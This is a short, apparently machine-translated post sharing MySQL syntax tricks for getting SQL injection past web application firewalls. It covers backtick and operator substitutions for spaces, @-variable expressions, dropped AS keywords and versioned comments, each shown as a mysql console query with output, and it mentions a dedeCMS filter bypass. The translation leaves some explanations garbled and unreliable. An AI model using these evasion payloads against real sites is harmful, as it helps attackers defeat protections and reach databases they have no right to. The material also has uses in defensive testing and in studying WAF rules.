I have studied waf at home and abroad. Share some amazing tricks.
Some skills that everyone knows are as follows :/*! */, SELECT [0x09, 0x0A-0x0D, 0x20, 0xA0] xx FROM does not recreate the wheel.
Mysql
Tips1: Magic '(the controller of the output table in the format)
Space and some regular expressions.
mysql> select`version`() -> ; +----------------------+ | `version`() | +----------------------+ | 5.1.50-community-log | +----------------------+ 1 row in set (0.00 sec)
A more interesting technique, this 'control' can be used as a annotator (conditional ).
mysql> select id from qs_admins where id=1;`dfff and comment it; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec)
Usage: where id = '0''' xxxxcomment on.
Tips2: Magic-+.
mysql> select id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec)mysql> select+id-1+1.from qs_admins; +----------+ | +id-1+1. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec)mysql> select-id-1+3.from qs_admins; +----------+ | -id-1+3. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec)
(Some people are not always talking about keywords. Why? Filter A from... is connected in this way)
Tips3 :@
mysql> select@^1.from qs_admins; +------|+ | @^1. | +------|+ | NULL | +------|+
This is bypass used dedeCMS filter.
Or OK.
Tips4: mysql function () as xxx does not need as or space
mysql> select-count(id)test from qs_admins; +------|+ | test | +------|+ | -1 | +------|+ 1 row in set (0.00 sec)
Tips5 :/*! [> 5000] */new build version number (this may be outdated .)
mysql> /\*!40000select\*/ id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec)
Share so much.